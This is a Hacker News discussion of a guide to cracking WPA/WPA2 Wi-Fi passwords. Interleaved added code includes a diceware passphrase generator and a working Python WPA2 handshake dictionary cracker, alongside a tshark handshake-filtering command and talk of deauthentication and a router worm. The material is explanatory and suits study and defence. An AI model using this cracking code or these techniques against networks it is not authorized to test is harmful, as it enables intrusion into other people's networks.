
Crack WPA/WPA2 Wi-Fi Routers with Aircrack-Ng and Hashcat - braxxox
https://github.com/brannondorsey/wifi-cracking
======
throwasehasdwi
I'm not sure why this is amazing enough to make the first page but W/E it's HN
:). Just so the less informed are aware, this has been feasible for maybe 7 years
(since GPU calculation became possible).

Just so nobody freaks out, this is cracking weak passwords, not broken WPA.

I have myself cracked countless WiFi passwords when security testing. It's
easy if the passwords are bad, which is maybe 90% of the time for home
networks and 60% for businesses. The attack is completely passive if you don't
want to be noticed, and with a cheap dish you can pick up both ends of the
handshakes from up to around a quarter mile away (line of sight).

~~~
mdeeks
Can someone define what is considered a weak vs strong password now for WiFi?
The only guides I found online are years old.

Is 10 characters considered weak for mixed case letters, numbers, plus
punctuation now?

~~~
rocqua
To do this formally, you need to consider information entropy. This is all
about how you generated your password. 10 characters of totally random mixed
case, numbers and punctuation gives about 60 bits of entropy which is strong
enough.

HOWEVER, that calculation only works if all 10 characters were generated
uniformly and randomly. Humans are terrible at this. Now, maybe your trick for
turning words into safe passwords is great, but there is no way to be sure.
Sadly, remembering 10 random characters is hard.

Luckily, easy to remember and strong passwords are possible. The system I
would recommend is diceware: www.diceware.com

~~~
joshjje
There was a nice comic/picture of this. I tend to follow it. Basically using
3-4 short words as a phrase instead of random characters. You can toss special
characters in between, before or after. They are also much easier to remember.
Password "FoolMeOnce!ShameOnMe" for example.

~~~
freeflight
For completeness sake, this is probably the comic you are referencing:
[https://xkcd.com/936/](https://xkcd.com/936/)

~~~
shpx

        curl -s https://raw.githubusercontent.com/first20hours/google-10000-english/master/google-10000-english-no-swears.txt | shuf | head -n 4 | tr '\n' ' '; echo
        mine wear vacation mostly
    

log2(10^16) = 53 bits of entropy or 300 years if your attacker can do a
million guesses per second (the link says 1000 keys per second, but that's on
the CPU).

You could also use `cat /usr/share/dict/words` instead of the `curl`, which is
a much larger word list, but you get impractical passwords like "globular
cellulose's malnutrition's dangling".

~~~
icebraining
Careful, shuf is not cryptographically safe by default! You need to pass
--random-source=/dev/urandom to get a proper RNG.

[https://www.gnu.org/software/coreutils/manual/html_node/Rand...](https://www.gnu.org/software/coreutils/manual/html_node/Random-sources.html)
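
A diceware-style generator in Python that does what the shuf pipeline above does but draws every word from the OS CSPRNG (the point icebraining raises about shuf's default RNG) and computes the entropy figure shpx works out by hand. This is an added example, not code from the guide or from anyone in the thread. The embedded word list is a small constructed stand-in for google-10000-english or /usr/share/dict/words, and `usable_words` is a filter of my own that drops possessives, non-words and very long words so the output stays typeable.

```python
import math
import re
import secrets

# Constructed stand-in for a real word list (a real one has thousands of entries).
SAMPLE_WORDS = [
    "mine", "wear", "vacation", "mostly", "fool", "shame", "once", "globular",
    "cellulose", "dangling", "cellulose's", "malnutrition's", "a", "extraordinarily",
]


def usable_words(words, min_len=3, max_len=8):
    """Keep only plain lowercase alphabetic words of a sane length, deduplicated
    in order. This is what turns /usr/share/dict/words into a list that does not
    hand you "cellulose's malnutrition's"."""
    seen = set()
    out = []
    for w in words:
        w = w.strip().lower()
        if not re.fullmatch(r"[a-z]+", w) or not (min_len <= len(w) <= max_len):
            continue
        if w not in seen:
            seen.add(w)
            out.append(w)
    return out


def entropy_bits(dict_size, n_words):
    """Entropy of n_words drawn uniformly, with replacement, from dict_size words:
    n * log2(dict_size). Only valid if every draw really is uniform and random."""
    return n_words * math.log2(dict_size)


def years_to_exhaust(bits, guesses_per_second):
    """Worst-case time to try the whole space at a given guess rate."""
    return (2 ** bits) / guesses_per_second / (365.25 * 24 * 3600)


def generate_passphrase(words, n_words=4, sep=" "):
    """Draw with secrets.choice (backed by os.urandom), never random.choice
    or an unseeded shuf, so the entropy figure above actually applies."""
    return sep.join(secrets.choice(words) for _ in range(n_words))


def load_wordlist(path):
    """Read a real word list (one word per line) through the same filter."""
    with open(path, encoding="utf-8", errors="ignore") as f:
        return usable_words(f)


if __name__ == "__main__":
    words = usable_words(SAMPLE_WORDS)
    print(generate_passphrase(words))
    # shpx's figures: four words from a 10,000-word list, attacker at 1M guesses/s
    bits = entropy_bits(10_000, 4)
    print(f"{bits:.1f} bits, about {years_to_exhaust(bits, 1e6):.0f} years to exhaust at 1M/s")
```

With the real google-10000 list the four-word draw gives the same 53 bits shpx computes; with a filtered /usr/share/dict/words (tens of thousands of entries) it is higher, and the filter is what keeps the phrases usable.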

~~~
shpx
Why does shuf implement its own random number generator? Why isn't
/dev/urandom the default?

[https://sockpuppet.org/blog/2014/02/25/safely-generate-rando...](https://sockpuppet.org/blog/2014/02/25/safely-generate-random-numbers/)

~~~
icebraining
shuf is not a crypto tool, and the GNU coreutils are written to be cross-
platform, even where /dev/urandom doesn't exist, or is unreliable. That's my
guess, at least.

------
aerovistae
I attempted to do this once and it turned out to be monumentally difficult. I
got as far as setting up a bootable kali thumb drive before getting stopped in
my tracks by hardware incompatibilities and unexpected behaviors and errors.
These articles make it sound a LOT easier than it is. I was very disappointed
because I was really excited about it.

~~~
rxhernandez
I beg to differ. I was doing this at 15 or 16 years old in 2006 when it was
still called backtrack. So long as you had a mainstream laptop, the most
difficult part was buying a compatible wireless card.

To note, the extent of my technical abilities at that time wasn't much beyond
being able to install a mainstream linux distribution or write a simple
program in C.

~~~
maxerickson
Yeah, I used Backtrack to show my brother that his big complex password didn't
mean anything if he was using WEP (this was quite a while ago).

On a pretty standard laptop (intel chipset/CPU/GPU/Wireless) it booted right
up with no effort.

------
polpo
4,733,979 out of the 14,344,391 passwords (33%) in the rockyou.txt dictionary
file used for cracking in this guide are too short to be WPA2 passwords, which
have a minimum length of 8 characters. Are aircrack and/or hashcat smart
enough to not bother hashing those short passwords?

~~~
domenukk
5 million hashes only take a few seconds for wpa2 anyway... Less than two for
this system:
[https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a27...](https://gist.github.com/epixoip/a83d38f412b4737e99bbef804a270c40)

~~~
stusmall
They don't touch it in this tutorial but typically you don't check just what's
in your dictionary. You also use a set of rules to manipulate your dictionary
that massively increases the number of hashes to perform. Those 5 million
entries quickly pass tens of billions of hashes that need to be run. These
initial entries might be too short like OP pointed out, but after the rules
are applied it might generate many entries that will be long enough to spend
time hashing.

The keyspace for WPA is huge and the hash speed is still relatively slow; even
with an extremely high-end system like the one you linked to, the quality of the
initial dictionary is really important.

------
yedpodtrzitko
Is there anything novel in there? On a first sight it seems just like a guide
done hundred times before...

~~~
IncRnd
Nope. This is an ancient attack.

------
bobsgame
I had the idea a long time ago to make a dd-wrt image which would
automatically crack the vulnerable routers within distance, detect the model,
and install a compatible version of itself in order to spread virally and
create a mesh network. I'm not going to pursue it because it probably breaks a
lot of laws, but I'm still curious if it would have been possible. Does anyone
know if this is actually feasible? Maybe the radios can't handle that sort of
thing?

~~~
pletnes
Did you mean this?

[http://gizmodo.com/264050/slurpr-wi-fi-box-sucks-up-six-sign...](http://gizmodo.com/264050/slurpr-wi-fi-box-sucks-up-six-signals-for-super-broadband)

------
thinkxl
wifite2[1] is a wrapper tool that does all this automatically.

Not trying to say that easier is better, in this case. Just wanted to show
this tool for those who don't know it.

[1] - [https://github.com/derv82/wifite2](https://github.com/derv82/wifite2)

edit: added wifite initially, replaced it with wifite2

------
webaholic
To the script kiddies out there who read this: Do not try this on others' wifi.
It is a crime in the USA to crack network routers. Although the chance of you
getting caught is low, better be safe than sorry.

~~~
slackingoff2017
It is possible to catch 4 way handshakes completely passively. You're not
hacking into anything, simply observing.

It's not illegal to receive signals on an unlicensed band with stock equipment.

~~~
pavel_lishin
> _It's not illegal to receive signals on an unlicensed band with stock
> equipment_

But my neighbors would still be pretty miffed, and would likely have legal
recourse, if I passively captured their EM emissions in the 390-700nm band
through their bedroom windows at night on a regular basis.

------
buschtoens
The deauthentication packet looks interesting. Does that mean that I could
annoy the hell out of my neighbors by constantly forcing all of their devices
to reconnect?

------
infamousjoeg
How long does the cracking process take? I remember WEP only taking 10 minutes
using aircrack-ng in BackTrack... I imagine this takes substantially longer.

~~~
rexicus
It's not viable for those random 12-ish digit passwords most ISPs will use.

~~~
Qub3d
Yeah, which is why it is sometimes weirdly _safer_ to not change your SSID - a
cracker can assume that someone who figured out how to change the broadcast
name could've also changed the WiFi password... often to something much less
secure.

~~~
tFXR89qo
SSID is used for password hashing, so better change it from default to avoid
rainbow tables.

------
billfor
Just fyi if you are using Kali the rockyou list is already in
/usr/share/wordlists.

Also to reduce the size of the pcap file, you may want filter it for EAPOL
packets only:

        tshark -r input.pcap -Y "eapol || wlan.fc.type_subtype == 0x08" -w small.pcap

------
nictrix
The DSL provider in my area sets up customer's wireless networks with their
home or mobile phone number as the password. If you know that number or can
look it up in public records then you're in. If you can't find it maybe use a
dictionary pertaining to the area code of phone numbers and then you're in.
When the protocol changes to something more secure, the ISP's customer will
still be as insecure as they always were.

~~~
c3833174
That's not as bad as deriving password and SSID (Provider-$generated_number)
from the MAC address; it didn't take much for somebody to reverse the
algorithm from the bootloader and make various programs to calculate the few
possible passwords from the SSID.

------
nikkwong
Can someone help me understand why, from a technical perspective, it is
necessary to capture the handshake?

~~~
mattfaus
The handshake contains the encrypted password. The idea is to reverse this
encryption to obtain the plaintext password.
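
As an added example, not code from the guide, aircrack-ng or hashcat, here is the arithmetic a cracker runs on a captured handshake, in Python. The passphrase never travels over the air; what the capture holds is the two nonces and a MIC, a keyed hash over the EAPOL frame whose key descends from the passphrase via PBKDF2 with the SSID as salt. Cracking means redoing that derivation per guess until the MIC matches. The same block covers polpo's question above (candidates shorter than 8 characters are dropped before the expensive step) and tFXR89qo's point that the SSID is the salt. The MAC addresses, nonces, EAPOL frame and word list are constructed for the example; the one real value is the published 802.11 PBKDF2 test vector (passphrase "password", SSID "IEEE"), which the code checks against.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, so a table built for one SSID is useless against
    another, and the 4096 iterations are what make each guess slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK, the key that authenticates the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, key_version: int = 2) -> bytes:
    """MIC over the EAPOL-Key frame with its 16-byte MIC field zeroed.
    key_version 1 (WPA/TKIP) is HMAC-MD5; 2 (WPA2/CCMP) is HMAC-SHA1 cut to 16."""
    if key_version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def wpa_candidate_ok(pw: str) -> bool:
    """A WPA/WPA2 passphrase is 8 to 63 printable ASCII characters; anything
    else (a third of rockyou.txt) can be skipped before the expensive PBKDF2."""
    return 8 <= len(pw) <= 63 and all(32 <= ord(c) <= 126 for c in pw)


def crack(handshake: dict, ssid: str, wordlist):
    """For each usable candidate: PMK -> PTK -> KCK -> MIC, compare with the
    captured MIC. Returns the matching passphrase or None."""
    for pw in wordlist:
        if not wpa_candidate_ok(pw):
            continue
        kck = derive_ptk(derive_pmk(pw, ssid), handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"]), handshake["mic"]):
            return pw
    return None


# --- constructed handshake (hypothetical network, not a real capture) ---
SSID = "ExampleNet"
TRUE_PASSPHRASE = "FoolMeOnce!ShameOnMe"
_AP = bytes.fromhex("001122334455")
_STA = bytes.fromhex("66778899aabb")
_ANONCE = bytes(range(32))
_SNONCE = bytes(range(32, 64))
# Layout of EAPOL-Key message 2 (STA -> AP) with the MIC field zeroed, which is
# exactly the byte string the MIC is computed over.
_EAPOL_M2_ZEROED = (
    bytes.fromhex("0103005f02010a0010")  # 802.1X hdr, descriptor, key info, key len
    + bytes(8)                           # replay counter
    + _SNONCE + bytes(16 + 8 + 8)        # SNonce, IV, RSC, ID
    + bytes(16)                          # MIC field, zeroed before hashing
    + bytes(2)                           # key data length
)
WORDLIST = ["123456", "password", "FoolMeOnce", "foolmeonce!shameonme", TRUE_PASSPHRASE]
IEEE_VECTOR = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def build_handshake() -> dict:
    """What a sniffer sees: MACs, both nonces, the frame and the MIC the STA sent."""
    kck = derive_ptk(derive_pmk(TRUE_PASSPHRASE, SSID), _AP, _STA, _ANONCE, _SNONCE)[:16]
    return {"ap_mac": _AP, "sta_mac": _STA, "anonce": _ANONCE, "snonce": _SNONCE,
            "eapol": _EAPOL_M2_ZEROED, "mic": eapol_mic(kck, _EAPOL_M2_ZEROED)}


if __name__ == "__main__":
    assert derive_pmk("password", "IEEE").hex() == IEEE_VECTOR  # 802.11 published vector
    hs = build_handshake()
    print("recovered:", crack(hs, SSID, WORDLIST))
    print("wrong SSID:", crack(hs, "OtherSSID", WORDLIST))
```

This is why the capture has to contain the handshake and not just beacons: the ANonce comes from message 1 or 3 and the SNonce and MIC from message 2, and without all of them there is nothing to test a guess against. aircrack-ng and hashcat run this same derivation, with the PBKDF2 step on CPU or GPU, so their speed is bounded by 4096 HMAC-SHA1 rounds per candidate per SSID.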

------
nextstep
Does this only crack single word passwords? If my password was two common
dictionary words or a common word plus a single number, would this try that
possibility?

~~~
braxxox
Using a wordlist with aircrack-ng seems to only try the literal passwords in
the dictionary. If you use naive-hashcat, a series of dictionary, rule,
combination, and brute-force attacks will be used. I recommend reading up on
the hashcat wiki ([https://hashcat.net/wiki/](https://hashcat.net/wiki/)) to
learn how to conduct your own custom hashing attacks.

------
rootsudo
Honestly, why reinvent the wheel. Use Wifite2 with a proper password list and
done.

~~~
jagermo
the proper password list part really is the challenge.

------
tambourine_man
Anyone tried Apple's Airport drivers and Linux on VirtualBox?

------
baalimago
most people don't change the password on their routers anymore

